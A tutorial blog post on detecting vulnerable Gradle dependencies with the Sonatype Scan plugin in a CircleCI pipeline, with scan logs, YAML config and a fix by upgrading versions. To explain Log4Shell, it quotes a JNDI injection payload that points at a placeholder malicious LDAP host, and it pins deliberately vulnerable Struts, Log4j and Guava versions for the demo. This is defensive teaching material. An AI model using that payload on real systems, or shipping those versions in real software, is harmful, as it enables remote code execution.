Automating vulnerability scanning for Gradle dependencies with CircleCI
Software Engineer
Detecting dependency vulnerabilities in a Gradle-based project is crucial because it prevents applications from using libraries (dependencies) with security holes.
Imagine an application as a house. Each dependency, or library used in the project, is like building material (such as wood, glass, or bricks). If there’s a flawed or easily penetrable material, the house can become unsafe, such as being more vulnerable to thieves or collapsing during an earthquake.
In software development, security vulnerabilities in dependencies can be exploited by attackers to infiltrate systems, steal data, or damage applications. To mitigate these risks, it is essential to detect and update vulnerable dependencies.
In this article, you will learn how to automatically detect dependency vulnerabilities on CI/CD with CircleCI.
Prerequisites
To follow this tutorial, a few things are required:
- A CircleCI account
- A GitHub account
- Intellij IDEA installed
- Familiarity with using Gradle
- Git installed
Risks of dependency vulnerabilities
Vulnerabilities in dependencies can serve as entry points for bad actors to attack a system. Exploiting a vulnerable dependency can be more damaging than a bug in the application’s main code itself.
A real-life example of dependency vulnerability is CVE-2021-44228, also known as Log4Shell, and found in Log4j version 2.14.1 as well as several earlier versions.
How does an attacker use the vulnerability?
This vulnerability occurs because of the JNDI Lookup feature in Log4j version 2.14.1. Log4j is a logging library widely used in Java applications to record various pieces of information.
The problem is the JNDI Lookup feature allows Log4j to fetch and execute code from external sources. An attacker can insert malicious strings into the application log, for example:
${jndi:ldap://malicious-server.com/exploit}
If an application logs this string, Log4j will interpret it as an instruction to fetch code from a malicious server controlled by an attacker. As a result, malicious code can be executed on the system without permission.
This is called Remote Code Execution (RCE). In RCE, an attacker can run commands on the victim’s server, opening a loophole to steal data, take over the system, or perform further attacks.
Possible outcomes of unaddressed vulneralbilities
- Remote code execution (RCE): Attackers can take control of affected systems.
- Data theft: Sensitive information such as credentials or user data can be stolen.
- Malware & ransomware: Attackers can plant malware on targeted servers.
- Service disruption: Applications can be compromised or shut down by attackers.
Detecting dependency vulnerabilities
To better understand this issue, let’s create a simple project example with Gradle. In this post, we use IntelliJ IDEA. Open the IDE and create a new project as shown in the screenshot below:
The project structure will be like the tree shown below:
VulnDependenciesCheck/
├── gradle/
│ └── wrapper/
│ ├── gradle-wrapper.jar
│ └── gradle-wrapper.properties
├── src/
│ └── main/
│ └── java/
├── build.gradle
├── gradle.properties
├── gradlew
├── gradlew.bat
└── settings.gradle
Let’s open the build.gradle file and add the following dependencies in the dependencies block:
implementation 'org.apache.struts:struts2-core:2.5.10'
implementation 'org.apache.logging.log4j:log4j-core:2.14.1'
implementation 'com.google.guava:guava:24.1.1-jre'
All three dependencies are vulnerable:
org.apache.struts:struts2-core:2.5.10This version is vulnerable to Remote Code Execution (RCE), such as CVE-2017-5638, which was exploited in the Equifax attack. An attacker could execute malicious code via HTTP header manipulation.org.apache.logging.log4j:log4j-core:2.14.1This version is affected by the Log4Shell vulnerability (CVE-2021-44228). An attacker could perform RCE via a log string that includes${jndi:...}.com.google.guava:guava:24.1.1-jreA deserialization vulnerability (CVE-2018-10237) exists that allows memory exhaustion if an untrusted object is de-serialized. This could be exploited for Denial of Service (DoS).
An IDE like Intellij IDEA can also detect dependency vulnerabilities. But this is just a warning, and you aren’t required to fix it.
There are a few key reasons why manual or local security scans are often not enough:
1. Developers often skip local scans due to time pressure In a fast-paced development environment, developers are more focused on new features and bug fixes than running security scans.
They may think, “As long as my code runs on my machine, that’s good enough” without considering potential security risks. We can see that in the Intellij IDE there is even an option to ignore this vulnerability warning.
2. Inconsistent results across environments For example, a difference in JDK versions between a developer’s machine and a production server can affect how code runs, including security.
Cached or improperly updated dependencies can also cause differences in scan results between local and CI/CD environments.
3. No centralized visibility and enforcement Without a centralized security scanning system, enterprises do not have a clear picture of the security posture of their applications.
There is no standard way to ensure that all teams are following established security policies.
Security threats can slip through the cracks undetected until the code is in production, where remediation can be much more expensive. Thus, IDE or local scanning has significant limitations.
Automating vulnerability detection
One solution is to integrate automated security scanning into the CI/CD pipeline and use a centralized platform for monitoring and enforcing security policies.
Many dev teams use CircleCI because it offers high build speed, flexible configuration via YAML, and native support for Docker and smart caching; all of which speed up the pipeline. CircleCI’s tight integration with GitHub and Bitbucket, and its ability to run jobs in parallel and distributed, make it an ideal choice for development teams that prioritize efficiency and scalability in their software development process.
Using Sonatype Scan
Sonatype Scan Gradle Plugin is a Gradle plugin that allows you to scan, evaluate, and audit dependencies in Gradle projects using Sonatype platforms, such as OSS Index and Nexus IQ Server.
Using this plugin, you can identify open-source components in your project that have known security vulnerabilities, helping to ensure the security and compliance of your software.
Open the build.gradle file and add the Sonatype Scan plugin in the plugins block:
plugins {
// ...other plugins
id 'org.sonatype.gradle.plugins.scan' version '2.8.3' // Update the version as needed
}
Try running a scan locally first. Open a terminal on the IDE, then run this command:
./gradlew ossIndexAudit
Let’s see the results:
Here are the complete log results:
________ ___ ___ __ ____ ____________ _ __
/ ___/ _ \/ _ | / _ \/ / / __/ / __/ ___/ _ | / |/ /
/ (_ / , _/ __ |/ // / /__/ _/ _\ \/ /__/ __ |/ /
\___/_/|_/_/ |_/____/____/___/ /___/\___/_/ |_/_/|_/
_ _ _ _
/_) /_`_ _ _ _/_ _ _ (/ /_`_._ _ _/ _
/_)/_/ ._//_// //_|/ /_//_//_' (_X / ///_'/ //_/_\
_/ _//
Gradle Scan version: 2.8.3
------------------------------------------------------------------------------------------------------------------------------------------------------
Checking vulnerabilities in 15 dependencies
Found vulnerabilities in 5 dependencies
[1/5] - pkg:maven/org.apache.struts/struts2-core@2.5.10 - 12 vulnerabilities found!
Vulnerability Title: [CVE-2017-12611] CWE-20: Improper Input Validation
ID: CVE-2017-12611
Description: In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string l...
CVSS Score: (9.8/10, Critical)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2017-12611
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2017-12611?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2017-5638] CWE-755: Improper Handling of Exceptional Conditions
ID: CVE-2017-5638
Description: The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-...
CVSS Score: (9.8/10, Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2017-5638
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2017-5638?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2019-0230] CWE-1321
ID: CVE-2019-0230
Description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code ...
CVSS Score: (9.8/10, Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2019-0230
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2019-0230?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2020-17530] CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
ID: CVE-2020-17530
Description: Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache...
CVSS Score: (9.8/10, Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2020-17530
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2020-17530?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2023-50164] CWE-552: Files or Directories Accessible to External Parties
ID: CVE-2023-50164
Description: An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicio...
CVSS Score: (9.8/10, Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2023-50164
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2023-50164?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2018-11776] CWE-noinfo
ID: CVE-2018-11776
Description: Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true ...
CVSS Score: (8.1/10, Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2018-11776
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2018-11776?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2017-9804] CWE-20: Improper Input Validation
ID: CVE-2017-9804
Description: In Apache Struts 2.3.7 through 2.3.33 and 2.5 through 2.5.12, if an application allows entering a URL in a form field and built-in URLVal...
CVSS Score: (7.5/10, High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE: CVE-2017-9804
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2017-9804?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2019-0233] CWE-281: Improper Preservation of Permissions
ID: CVE-2019-0233
Description: An access permission override in Apache Struts 2.0.0 to 2.5.20 may cause a Denial of Service when performing a file upload.
CVSS Score: (7.5/10, High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE: CVE-2019-0233
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2019-0233?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2023-34396] CWE-770: Allocation of Resources Without Limits or Throttling
ID: CVE-2023-34396
Description: Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache ...
CVSS Score: (7.5/10, High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE: CVE-2023-34396
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2023-34396?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2017-9787] CWE-284: Improper Access Control
ID: CVE-2017-9787
Description: Struts 2 - OGNL access to class members of Spring proxy The software does not restrict or incorrectly restricts access to a resource fro...
CVSS Score: (7.1/10, High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H
CVE: CVE-2017-9787
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2017-9787?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2023-34149] CWE-770: Allocation of Resources Without Limits or Throttling
ID: CVE-2023-34149
Description: Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache ...
CVSS Score: (6.5/10, Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
CVE: CVE-2023-34149
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2023-34149?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2017-7672] CWE-20: Improper Input Validation
ID: CVE-2017-7672
Description: If an application allows enter an URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which wi...
CVSS Score: (5.9/10, Medium)
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE: CVE-2017-7672
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2017-7672?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
[2/5] - pkg:maven/commons-fileupload/commons-fileupload@1.3.2 - 2 vulnerabilities found!
Vulnerability Title: [CVE-2016-1000031] CWE-284: Improper Access Control
ID: CVE-2016-1000031
Description: Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote Code Execution
CVSS Score: (9.8/10, Critical)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2016-1000031
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2016-1000031?component-type=maven&component-name=commons-fileupload%2Fcommons-fileupload&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2023-24998] CWE-770: Allocation of Resources Without Limits or Throttling
ID: CVE-2023-24998
Description: Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attack...
CVSS Score: (7.5/10, High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE: CVE-2023-24998
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2023-24998?component-type=maven&component-name=commons-fileupload%2Fcommons-fileupload&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
[3/5] - pkg:maven/commons-io/commons-io@2.4 - 2 vulnerabilities found!
Vulnerability Title: [CVE-2024-47554] CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion')
ID: CVE-2024-47554
Description: Uncontrolled Resource Consumption vulnerability in Apache Commons IO. The org.apache.commons.io.input.XmlStreamReader class may excessiv...
CVSS Score: (5.3/10, Medium)
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
CVE: CVE-2024-47554
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2024-47554?component-type=maven&component-name=commons-io%2Fcommons-io&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2021-29425] CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
ID: CVE-2021-29425
Description: commons-io - Path Traversal [CVE-2021-29425] The software uses external input to construct a pathname that is intended to identify a fil...
CVSS Score: (5.3/10, Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE: CVE-2021-29425
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2021-29425?component-type=maven&component-name=commons-io%2Fcommons-io&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
[4/5] - pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1 - 4 vulnerabilities found!
Vulnerability Title: [CVE-2021-44228] CWE-20: Improper Input Validation
ID: CVE-2021-44228
Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log m...
CVSS Score: (10.0/10, Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE: CVE-2021-44228
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2021-44228?component-type=maven&component-name=org.apache.logging.log4j%2Flog4j-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2021-45046] CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
ID: CVE-2021-45046
Description: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This cou...
CVSS Score: (9.0/10, Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE: CVE-2021-45046
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2021-45046?component-type=maven&component-name=org.apache.logging.log4j%2Flog4j-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2021-44832] CWE-20: Improper Input Validation
ID: CVE-2021-44832
Description: Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execut...
CVSS Score: (6.6/10, Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2021-44832
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2021-44832?component-type=maven&component-name=org.apache.logging.log4j%2Flog4j-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2021-45105] CWE-20: Improper Input Validation
ID: CVE-2021-45105
Description: Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-refer...
CVSS Score: (5.9/10, Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE: CVE-2021-45105
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2021-45105?component-type=maven&component-name=org.apache.logging.log4j%2Flog4j-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
[5/5] - pkg:maven/com.google.guava/guava@24.1.1-jre - 2 vulnerabilities found!
Vulnerability Title: [CVE-2023-2976] CWE-552: Files or Directories Accessible to External Parties
ID: CVE-2023-2976
Description: Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix syst...
CVSS Score: (7.1/10, High)
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
CVE: CVE-2023-2976
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2023-2976?component-type=maven&component-name=com.google.guava%2Fguava&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
Vulnerability Title: [CVE-2020-8908] CWE-379: Creation of Temporary File in Directory with Incorrect Permissions
ID: CVE-2020-8908
Description: guava - Creation of Temporary File in Directory with Insecure Permissions [CVE-2020-8908] The software creates a temporary file in a dir...
CVSS Score: (3.3/10, Low)
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVE: CVE-2020-8908
Reference: https://ossindex.sonatype.org/vulnerability/CVE-2020-8908?component-type=maven&component-name=com.google.guava%2Fguava&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2
> Task :ossIndexAudit FAILED
In this log, each vulnerability is listed, complete with a description, CVSS score, CVE reference, and detailed analysis link. The Gradle Scan tool (v2.8.3) checked 15 dependencies and found vulnerabilities in 5 of them. org.apache.struts is one of the most problematic libraries; struts2-core@2.5.10 has 12 CVEs, most of which are Critical (CVSS 9.8) and allow Remote Code Execution. Other vulnerabilities include Improper Input Validation, File Upload Path Traversal, and Resource Exhaustion.
🔴 Status: Build FAILED due to a high-security vulnerability detected.
Automating Sonatype scan on CircleCI
To run Sonatype Scan on CircleCI, start by pushing your project to GitHub. Then, integrate it with CircleCI. During the setup, CircleCI will automatically create a new branch called circleci-project-setup, which includes an initial configuration file located at .circleci/config.yml.
The circleci-project-setup branch is generated by CircleCI to help initialize the pipeline configuration without directly modifying your main branch. This approach gives you the opportunity to review and customize the configuration before applying it to your primary development workflow.
When you open .circleci/config.yml, the default contents are:
# This config was automatically generated from your source code
# Stacks detected: deps:java:.,tool:gradle:
version: 2.1
jobs:
test-java:
docker:
- image: cimg/openjdk:17.0
steps:
- checkout
- run:
name: Calculate cache key
command: |-
find . -name 'pom.xml' -o -name 'gradlew*' -o -name '*.gradle*' | \
sort | xargs cat > /tmp/CIRCLECI_CACHE_KEY
- restore_cache:
key: cache-{{ checksum "/tmp/CIRCLECI_CACHE_KEY" }}
- run:
command: ./gradlew check
- store_test_results:
path: build/test-results
- save_cache:
key: cache-{{ checksum "/tmp/CIRCLECI_CACHE_KEY" }}
paths:
- ~/.gradle/caches
- store_artifacts:
path: build/reports
deploy:
# This is an example deploy job, not actually used by the workflow
docker:
- image: cimg/base:stable
steps:
# Replace this with steps to deploy to users
- run:
name: deploy
command: "#e.g. ./deploy.sh"
workflows:
build-and-test:
jobs:
- test-java
# - deploy:
# requires:
# - test-java
This workflow has two jobs by default, but only one is active.
- test-java: Runs Java tests with Gradle in a Docker container (OpenJDK 17), uses caching, and stores test results and reports.
- deploy: Placeholder for deployment; currently not used (commented out).
Now, after this, we need to create a new job to run Sonatype Scan on workflows. To do that, pull your code from GitHub and checkout to the circleci-project-setup branch:
git pull ** git checkout circleci-project-setup
Open the .circleci/config.yml file and add the job:
vulnerable-dependencies-scan:
docker:
- image: cimg/openjdk:17.0
steps:
- checkout
- run:
name: Scanning for Vulnerable Dependencies
command: ./gradlew ossIndexAudit
This job scans for vulnerable dependencies using the ossIndexAudit Gradle task by:
- Using Docker with OpenJDK 17
- Checking out the project code
- Running
./gradlew ossIndexAuditto detect known security issues in dependencies
Next, define it in the workflows section:
workflows:
build-and-test:
jobs:
- test-java
- vulnerable-dependencies-scan # the new job
# - deploy:
# requires:
# - test-java
You now have two active jobs: test-java and vulnerable-dependencies-scan.
Push to the repository and view the logs in the CircleCI dashboard after the pipeline build.
Your build has failed. In a real situation, you can require the developer team to fix the issue before deploying it to production.
Check the details to make sure everything is the same as what you tried locally.
So, how can you fix the build? Simply update the libraries or dependencies to a safe version:
implementation 'org.apache.struts:struts2-core:6.4.0'
implementation 'org.apache.logging.log4j:log4j-core:2.17.1'
implementation 'com.google.guava:guava:32.0.1-jre'
To summarize, this is the update we applied:
| Library | Previous Version | Updated Version | Reason for Upgrade |
|---|---|---|---|
| Struts2 | 2.5.10 | 6.4.0 | Security fixes, Jakarta EE support, Java 11+, improved modularity |
| Log4j | 2.14.1 | 2.17.1 | Log4Shell mitigation, other security patches, safer defaults |
| Guava | 24.1.1-jre | 32.0.1-jre | Performance improvements, new APIs, bug fixes, better support for modern Java |
You can merge the
circleci-project-setupbranch into your main branch and safely delete it afterward.
As expected, the build succeeds this time.
Conclusion
Detecting vulnerable dependencies is not optional: it’s a vital part of software development best practices. Just like weak building materials can endanger a house, outdated or insecure libraries can compromise your application, and your company. Manual checks via IDEs or local scans are prone to oversight and inconsistency, especially under the pressure of deadlines.
By integrating tools like the Sonatype Scan Gradle plugin into a CI/CD pipeline using CircleCI, your team gains a reliable, automated way to identify and mitigate risks early in the development process. This ensures not only better security and compliance but also faster, more confident delivery cycles.
Start automating your vulnerability scans today; secure code is sustainable code.
The complete code for this project is available on GitHub.
